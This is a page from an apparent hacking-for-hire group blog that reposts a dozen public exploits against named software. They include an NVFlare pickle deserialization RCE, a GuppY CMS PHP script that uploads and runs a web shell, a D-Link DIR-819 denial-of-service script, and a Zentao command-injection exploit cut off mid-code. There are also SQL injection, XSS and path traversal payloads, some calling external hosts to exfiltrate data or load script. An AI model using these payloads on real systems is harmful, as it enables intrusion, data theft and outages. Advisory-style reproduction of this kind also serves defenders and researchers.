Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863123687

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle
# Exploit Author: Elias Hohl
# Google Dork: N/A
# Date: 2022-06-21
# Vendor Homepage: https://www.nvidia.com
# Software Link: https://github.com/NVIDIA/NVFlare
# Version: < 2.1.4
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-34668

https://medium.com/@elias.hohl/remote-code-execution-in-nvidia-nvflare-c140bb6a2d55

There is a Remote Code Execution vulnerability https://github.com/NVIDIA/NVFlare. It is possible to execute arbitrary commands on the server for connected clients. It was not investigated if server can also execute commands on all clients (I expect this though, as it is by design required for the server to instruct the clients to execute commands if they need to train specific models). The consequence would be that a client can gain Remote Code Execution on the server an ALL connected clients.

The vulnerability exists due to the deserialization of user data with the pickle module. There are multiple places where this is done, I considered line 568 on private/fed/server/fed_server.py the occurrence that is accessible with the least efforts and thus used it in my PoC-Exploit.

The client generates a malicious data packet like this: aux_message.data["fl_context"].CopyFrom(bytes_to_proto(generate_payload('curl http://127.0.0.1:4321')))



REPLICATION

This example uses the server in poc-mode. The provision mode seems to run the same code in fed_server.py though and should be vulnerable as well. (To my understanding, the modes differ only regarding credentials).

This exploit replicates the Quickstart tutorial https://nvidia.github.io/NVFlare/quickstart.html with a maliciously modified client to execute commands on the server.

Make sure to use Python 3.8, the nightly builds don't work with Python >=3.9.

sudo apt update
sudo apt-get install python3-venv curl

python3 -m venv nvflare-env

source nvflare-env/bin/activate

python3 -m pip install -U pip
python3 -m pip install -U setuptools
python3 -m pip install torch torchvision tensorboard

git clone https://github.com/NVIDIA/NVFlare.git
cd NVFlare
git checkout 2.1.2
git apply nvflare-exploit-apply.txt  # note that this only modifies the client side code
python3 -m pip install .

cd
poc -n 2

mkdir -p poc/admin/transfer
cp -rf NVFlare/examples/* poc/admin/transfer

In four separate terminals, execute (after running source nvflare-env/bin/activate in each one):

./poc/server/startup/start.sh

./poc/site-1/startup/start.sh

./poc/site-2/startup/start.sh

./poc/admin/startup/fl_admin.sh localhost

In another terminal window, fire up a netcat instance to verify that Remote Code Execution is possible:
nc -lvp 4321

In the admin console, execute:

check_status server

to verify both clients are connected. Then:

submit_job hello-pt-tb

It will take a few minutes until the job finishes downloading the required files, then you should see a connection in the netcat tab and error messages in the server tab (because the received pickle payload is no data that the program can continue working with). You can also shutdown netcat, which will result in "Connection refused" errors in the server tab.
HireHackking 
# Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
# Date: Sep 30, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.freeguppy.org/
# Software Link:
https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
# Version: 6.00.10
# Tested on: Linux

#!/usr/bin/php

<?php

$username = "Admin2"; //Administrator username
$password = "rose1337"; //Administrator password


$options = getopt('u:c:');

if(!isset($options['u'], $options['c']))
die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n

\n");

$target     =  $options['u'];

$command    =  $options['c'];

// Administrator login

$cookie="cookie.txt";
$url = "{$target}guppy/connect.php";

$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
$curlObj = curl_init();

curl_setopt($curlObj, CURLOPT_URL, $url);
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlObj, CURLOPT_HEADER, 1);
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);
curl_setopt ($curlObj, CURLOPT_POST, 1);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
$result = curl_exec($curlObj);


// uploading shell

$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";

$post='------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="rep"

file
------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="ficup"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET["cmd"]); ?>

------WebKitFormBoundarygA1APFcUlkIaWal4--
';

$headers = array(


            'Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',

            'Accept-Encoding: gzip, deflate',
            'Accept-Language: en-US,en;q=0.9'
);
curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curlObj, CURLOPT_URL, $url2);
curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
curl_setopt($curlObj, CURLOPT_POST, true);
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");

$data = curl_exec($curlObj);


// Executing the shell


$shell = "{$target}guppy/file/shell.php?cmd=" .$command;
curl_setopt($curlObj, CURLOPT_URL, $shell);
curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:
application/x-www-form-urlencoded'));
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
curl_setopt($curlObj, CURLOPT_HEADER, False);
curl_setopt($curlObj, CURLOPT_POST, false);

$exec_shell = curl_exec($curlObj);

$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);

if($code != 200) {
    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the
credentials\n";
}
else {

print("\n");
print($exec_shell);

}
curl_close($curlObj);

?>
HireHackking 
## Exploit Title: Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal
## Exploit Author: nu11secur1ty
## Date: 09.29.2022
## Vendor: https://lavalite.org/
## Software: https://github.com/LavaLite/cms/releases/tag/v9.0.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite


## Description:
The XSRF-TOKEN cookie is vulnerable to path traversal attacks,
enabling read access to arbitrary files on the server.
The payload ../../../../../../../../../../../../../../../../etc/passwd[0x00]eyJpdiI6InhwNlhibUc0K3hrL3RQdHZNYlp5Qnc9PSIsInZhbHVlIjoiU2daQ2YzeFNWSjN4OHZNdEZSMlhiOVpkbGUweDdKSDdXbXc1eitGc3RSTXNFTFBqUGR1ekJOSitUTjcyWVRYTkVzV2lpMDkxb3FHM2k5S1Y2VlZZRGVVN2h2WkpJeGcxZVluVDhrdDkvUDgxN2hTNjY5elRtQllheDlPOEM5aGgiLCJtYWMiOiI4ZDBkMjI0NmFkNDQ2YTA5ZjhkNDI0ZjdhODk0NWUzMjY2OTIxMjRmMzZlZjI4YWMwNmRiYTU5YzRiODE5MDk5IiwidGFnIjoiIn0=
was submitted in the XSRF-TOKEN cookie.
The requested file was returned in the application's response. The
malicious user can get very sensitive information from this CMS
system.

STATUS: HIGH Vulnerability

[+]Payload:

```POST
GET /cms-master/website/public/about.html HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: XSRF-TOKEN=eyJpdiI6IjNZbEZudjg0RXpFNEVLWHBUK0p6R1E9PSIsInZhbHVlIjoiNjFVbmZUVUJQWVdYWXJVOUVJRWVVdHN0UWtOQjJXZGRiS2N4T2lkM0VDeXFxcDRZdG1tRFVaQUk3dlhsWHRvOVQxVnQvbFhWRUJTbUllczh6MmhFUE84N1puNVFMSVFFeWdmRlJUYkdFRGdCakZ4eEJXeHllRTdFOFNPK0pLcnkiLCJtYWMiOiJhMDBlZWFiNDFlNzE2Yzc1ZjA2NzEzYzY2Y2U0ZDQ3NzdkMTI4OTY1NjA4OTNmNDE4ZDNmNWRkYzFkN2IzMWEwIiwidGFnIjoiIn0%3D;
lavalite_session=eyJpdiI6ImxiWmVuV0xlU3ZtVWhLVW1Oc2duSEE9PSIsInZhbHVlIjoiUG5WMjhMNVppUkhST1Bta1FOd1VJUDR5ZW1lRU56bXpDTnpaVzkrUHFzQzJpKzE4YlFuNEQ2RnNlKzM2Tkg0Y2VZMExCRTBUUnRQajlpTmJCUXJjT3ZETzV6OVZveURuaTFHOHdoN3pneUR3NGhQc09OUjdKb0VreFV1Y0tuOTgiLCJtYWMiOiJlMTdlMTAyZTQ3MmMyMjZlMWE5MTkwMzc0NTU2OTFkOTlmOTM4MGVlZDE4NWU4MGNkZGM4OTllMTRmYTE3MGM1IiwidGFnIjoiJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmZXRjJTJmcGFzc3dkIn0%3d
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/cms-master/website/public/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="105", "Chromium";v="105"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

[+]Response:

```Request
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/manifest.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/vendor.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/app.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/main.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/theme.js"></script>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite)

## Proof and Exploit:
[href](https://streamable.com/nis1hg)

-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
HireHackking 
## Exploit Title: Employee Performance Evaluation System v1.0 - File Inclusion and RCE
## Exploit Author: nu11secur1ty
## Date: 03.17.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/

## Description:
The Employee Performance Evaluation System-1.0 suffer from File
Inclusion - RCE Vulnerabilities.
The usual user of this system is allowed to submit a malicious file or
upload a malicious file to the server.
After then this user can execute remotely the already malicious
included file on the server of the victim. This can bring the system
to disaster or can destroy all information that is inside or this
information can be stolen.

STATUS: CRITICAL Vulnerability


[+]Get Info:

```PHP
<?php
// by nu11secur1ty - 2023
	phpinfo();
?>

```
[+]Exploit:

```PHP
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ;

// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ;

// using rename() function to rename the file
rename( $old_name, $new_name) ;

?>
```

## Proof Of Concept:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0

-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                   
nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

DLink DIR 819 A1 - Denial of Service

HACKER · %s · %s

# Exploit Title: DLink DIR 819 A1 - Denial of Service # Date: 30th September, 2022 # Exploit Author: @whokilleddb (https://twitter.com/whokilleddb) # Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router # Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1) # Tested on: Firmware Version - 1.06 Hardware Version - A1 # CVE : CVE-2022-40946 # # Github: https://github.com/whokilleddb/dlink-dir-819-dos # # $ ./exploit.py -i 192.168.0.1 # [+] DLink DIR-819 DoS exploit # [i] Address to attack: 192.168.0.1 # [i] Using SSL: False # [i] Request Timeout: 30s # [i] Buffer Length: 19 # [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522 # [+] Exploit Successful! #!/usr/bin/env python3 import sys import string import urllib3 import requests import argparse import random import socket from rich import print # Disable SSL Warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Globals TIMEOUT = 30 #BUFFER_LEN = 19 BUFFER_LEN = 32 # Class to exploit class Exploit: def __init__(self, ip, is_ssl): """Initialize the constructor""" self.ip = ip self.is_ssl = is_ssl _payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}" if self.is_ssl: self.payload = f"https://{_payload}" else: self.payload = f"http://{_payload}" def show(self): """Show the parameters""" print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]") def run(self): """Run the exploit""" print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]") self.show() try: r = requests.get(self.payload, verify=False, timeout=TIMEOUT) if "Internal Error" in r.text: print(f"[bold][[green]+[/green]] Exploit Successful![/bold]") print(f"[bold][[green]+[/green]] Router services must be down![/bold]") else: print(f"[bold][[red]![/red]] Exploit Failed :([/bold]") except requests.exceptions.Timeout: print(f"[bold][[green]+[/green]] Exploit Successful![/bold]") except Exception as e: print(f"Error occured as: {e}") def main(): """Main function to run""" parser = argparse.ArgumentParser( description="DLink DIR-819 Unauthenticated DoS") parser.add_argument('-i', '--ip', required=True, help="IP of the router") parser.add_argument('-s', '--ssl', required=False, action="store_true") opts = parser.parse_args() try: ip = socket.gethostbyname(opts.ip) except socket.error: print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr) return is_ssl = opts.ssl exploit = Exploit(ip, is_ssl) exploit.run() if __name__ == '__main__': main()
HireHackking

Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) # Date: 2022-07-02 # Exploit Author: Ali Alipour # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 10 Pro x64 - XAMPP Server # CVE : CVE-2022-35155 #Issue Detail: The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. # Vulnerable page: /buspassms/download-pass.php # Vulnerable Parameter: searchdata [ POST Data ] #Request : POST /buspassms/download-pass.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3 Origin: https://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: https://127.0.0.1/buspassms/download-pass.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 25 searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search= #Response : HTTP/1.1 200 OK Date: Fri, 01 Jul 2022 00:14:25 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8 X-Powered-By: PHP/7.4.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6425 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html lang="en"> <head> <title>Bus Pass Management System || Pass Page</title> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba ...[SNIP]... <h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4> ...[SNIP]...
HireHackking

ImpressCMS v1.4.3 - Authenticated SQL Injection

HACKER · %s · %s

# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3 # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 7th March 2022 # CVE ID: CVE-2022-26986 # Confirmed on release 1.4.3, this vulnerability is patched in the version 1.4.4 and above... # Vendor: https://www.impresscms.org # Source: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3 ############################################### #Step1- Login with Admin Credentials #Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request): POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1 Host: 192.168.56.117 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701 Content-Length: 1011 Origin: http://192.168.56.117 Connection: close Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3 Upgrade-Insecure-Requests: 1 -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="mimetypeid" 1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="extension" bin -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="types" application/octet-stream -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="name" Binary File/Linux Executable -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="icms_page_before_form" http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="op" addmimetype -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="modify_button" Submit -----------------------------40629177308912268471540748701-- Vulnerable Payload: 1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP) Output: web application technology: Apache 2.4.52, PHP 7.4.27 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) available databases [6]: [*] impresscms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test
HireHackking

MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution

HACKER · %s · %s

# Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 26th Feb'2022 # CVE ID: CVE-2022-26149 # Confirmed on release 2.8.3-pl # Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt # Vendor: https://modx.com/download ############################################### #Step1- Login with Admin Credentials #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Add the php file extension under the "Uploadable File Types" option available in "System Settings" #Step3- Now Goto Media=>Media Browser and upload the Shell.php #Step4- Now visit http://IP_Address/Shell.php and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056 bash: cannot set terminal process group (1445): Inappropriate ioctl for device bash: no job control in this shell daemon@debian:/opt/bitnami/modx$
HireHackking

PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS

HACKER · %s · %s

Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS # Date: 2022-10-02 # Exploit Author: Prasheek Kamble # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ # Version: V 1.2 # Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php # Tested on MAC OS, XAMPP Steps to reproduce: 1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php 2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field 3) Click on Add Details and intercept the request in Burpsuite 4) After this, the details have been submitted. 5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired. 6) Now attacker get's the details of victim like ip address, cookies of Victim, etc 7) So attacker is sucessful in getting the victim's ip address and other details. #POC's https://ibb.co/kSxFp2g https://ibb.co/VvSVRsy https://ibb.co/mSGp4FX https://ibb.co/hXbJ9TZ https://ibb.co/M6vS08S
HireHackking

Canteen-Management v1.0 - SQL Injection

HACKER · %s · %s

## Exploit Title: Canteen-Management v1.0 - SQL Injection ## Exploit Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: https://www.mayurik.com/ ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi ## Description: The username parameter from Canteen-Management1.0-2022 appears to be vulnerable to SQL injection attacks. The malicious user can attack remotely this system by using this vulnerability to steal all information from the database of this system. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND 'awEr'='awEr&password=h5F!l8j!Y6&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi) ## Proof and Exploit: [href](https://streamable.com/vvz2lh) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path # Exploit Author: Luis Martinez # Discovery Date: 2022-10-05 # Vendor Homepage: https://www.infonetsoftware.com # Software Link : https://www.infonetsoftware.com/soft/instalar_Medicont_x.exe # Tested Version: 3.7.27 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "medicont3" | findstr /i /v """ servermedicontservice servermedicontservice C:\Program Files (x86)\medicont3\servermedicontservice.exe Auto # Service info: C:\>sc qc "servermedicontservice" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: servermedicontservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START (DELAYED) ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\medicont3\servermedicontservice.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : servermedicontservice DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting # Date: 2020-09-24 # Exploit Author: Sinem Şahin # Vendor Homepage: https://flatcore.org/ # Version: 2.1.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/install/index.php 2- Write XSS Payload into the username of the user account. 3- Press "Save" button. XSS Payload ==> "<script>alert("usernameXSS")</script>
HireHackking
# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) # Exploit Author: mister0xf # Date: 2022-10-8 # Software Link: https://github.com/easysoft/zentaopms # Version: tested on 17.0 (probably works also on newer/older versions) # Tested On: Kali Linux 2022.2 # Exploit Tested Using: Python 3.10.4 # Vulnerability Description: # Zentao Project Management System 17.0 suffers from an authenticated command injection allowing # remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver # Vulnerable Source Code: # /module/repo/model.php: # [...] # $client = $this->post->client; // <-- client is taken from the POST request # [...] # elseif($scm == 'Git') # { # if(!is_dir($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path); # return false; # } # # if(!chdir($path)) # { # if(!is_executable($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path); # return false; # } # dao::$errors['path'] = $this->lang->repo->error->path; # return false; # } # # $command = "$client tag 2>&1"; // <-- command is injected here # exec($command, $output, $result); import requests,sys import hashlib from urllib.parse import urlparse from bs4 import BeautifulSoup def banner(): print(''' ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# ######### ########## ### #### ######## ########### ### ### ######## ''') def usage(): print('Usage: zenciao user password http://127.0.0.1/path') def main(): if ((len(sys.argv)-1) != 3): usage() banner() exit() #proxy = {'http':'http://127.0.0.1:8080'} banner() username = sys.argv[1] password = sys.argv[2] target = sys.argv[3] # initialize session object session = requests.session() home_url = target+'/index.php' rand_url = target+'/index.php?m=user&f=refreshRandom&t=html' login_url = target+'/index.php?m=user&f=login&t=html' create_repo_url = target+'/index.php?m=repo&f=create&objectID=0' r1 = session.get(home_url) soup = BeautifulSoup(r1.text, "html.parser") script_tag = soup.find('script') redirect_url = script_tag.string.split("'")[1] r2 = session.get(target+redirect_url) # get random value session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) res = session.get(rand_url) rand = res.text # compute md5(md5(password)+rand) md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode()) # login request post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""} my_referer = 